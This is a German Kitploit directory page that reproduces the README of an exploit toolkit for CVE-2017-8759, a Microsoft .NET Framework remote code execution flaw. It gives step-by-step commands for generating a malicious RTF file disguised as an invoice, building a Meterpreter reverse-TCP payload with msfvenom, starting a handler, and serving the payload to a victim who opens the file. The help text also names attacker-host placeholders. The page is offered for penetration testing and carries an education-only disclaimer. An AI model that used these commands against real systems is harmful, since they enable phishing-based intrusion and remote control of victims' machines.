Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-8759 — Exploit toolkit CVE-2017-8759 - v1.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, die Microsoft .NET Framework RCE zu testen. Es kann eine bösartige RTF-Datei erzeugen und Metasploit / Meterpreter / andere Payloads ohne komplexe Konfiguration an das Opfer ausliefern. | Kitploit
Tools/GitHubGitHub/bhdresh/cve-2017-8759
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubbhdresh/cve-2017-8759

CVE-2017-8759

Repository anzeigen
31210946vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Exploit toolkit CVE-2017-8759 - v1.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, die Microsoft .NET Framework RCE zu testen. Es kann eine bösartige RTF-Datei erzeugen und Metasploit / Meterpreter / andere Payloads ohne komplexe Konfiguration an das Opfer ausliefern.

Teilen

Exploit-Toolkit CVE-2017-8759 - v1.0

Das Exploit-Toolkit CVE-2017-8759 - v1.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, die Microsoft .NET Framework RCE zu testen. Es kann eine bösartige RTF-Datei generieren und metasploit-/meterpreter-/andere Payloads ohne aufwändige Konfiguration an das Opfer ausliefern.

Haftungsausschluss

Dieses Programm ist NUR für Bildungszwecke bestimmt. Verwenden Sie es nicht ohne Erlaubnis. Der übliche Haftungsausschluss gilt, insbesondere die Tatsache, dass ich (bhdresh) nicht haftbar bin für Schäden, die durch direkte oder indirekte Nutzung der von diesen Programmen bereitgestellten Informationen oder Funktionalitäten entstehen. Der Autor oder ein Internetanbieter übernimmt KEINE Verantwortung für den Inhalt oder Missbrauch dieser Programme oder ihrer Ableitungen. Durch die Nutzung dieses Programms akzeptieren Sie, dass jegliche Schäden (Datenverlust, Systemabsturz, Systemkompromittierung usw.), die durch die Nutzung dieser Programme verursacht werden, nicht in der Verantwortung von bhdresh liegen.

Schließlich handelt es sich um eine persönliche Entwicklung, bitte respektieren Sie deren Philosophie und verwenden Sie sie nicht für böse Dinge!

Lizenz

CC BY 4.0 Lizenz - https://creativecommons.org/licenses/by/4.0/

Versionshinweise:

Im Skript wurden folgende Fähigkeiten eingeführt:

root@kitploit:~
- Generieren einer bösartigen RTF-Datei
- Exploit-Modus für generierte RTF-Datei

Version: Python 2.7.13

Szenario: Lokalen meterpreter-Payload ausliefern

Video-Tutorial: https://www.youtube.com/watch?v=46jEa1bmORM
Beispielbefehle
root@kitploit:~
1) Bösartige RTF-Datei generieren
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, bei Verwendung von MSF Payload): Metasploit-Payload generieren und Handler starten
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Toolkit im Exploit-Modus starten, um lokalen Payload auszuliefern
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

Kommandozeilenargumente:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

Dies ist ein praktisches Toolkit zum Ausnutzen von CVE-2017-8759 (Microsoft .NET Framework RCE)

Modi:

-M gen                                          Nur bösartige Datei generieren

     Bösartige RTF-Datei generieren:

      -w <Dateiname.rtf>                   Name der bösartigen RTF-Datei (Teilen Sie diese Datei mit dem Opfer).

      -u <http://angreifer.com/test.txt>   Pfad der entfernten Textdatei. Normalerweise sollte dies eine Domain oder IP sein, auf der dieses Tool läuft.
                                          Zum Beispiel http://angreiferip.com/test.txt (Diese URL wird in die bösartige RTF-Datei eingefügt und wird angefordert, sobald das Opfer die bösartige RTF-Datei öffnet).

				      
-M exp                                          Exploit-Modus starten

     Ausnutzung:
  
      -p <TCP-Port:Standard 80>            Lokale Portnummer.

      -e <http://angreifer.com/shell.exe>  Pfad einer ausführbaren Datei / meterpreter-Shell / Payload, die auf dem Ziel ausgeführt werden soll.

      -l </tmp/shell.exe>                 Lokalen Pfad einer ausführbaren Datei / meterpreter-Shell / Payload angeben.

Autor

@bhdresh

Danksagung

@Voulnet, @vysec, @bhdresh

Fehler, Probleme, Funktionswünsche

Offensichtlich bin ich kein Vollzeitentwickler, also erwarten Sie einige Hürden.

Bitte melden Sie Fehler und Probleme über https://github.com/bhdresh/CVE-2017-8759/issues/new

Tool herunterladen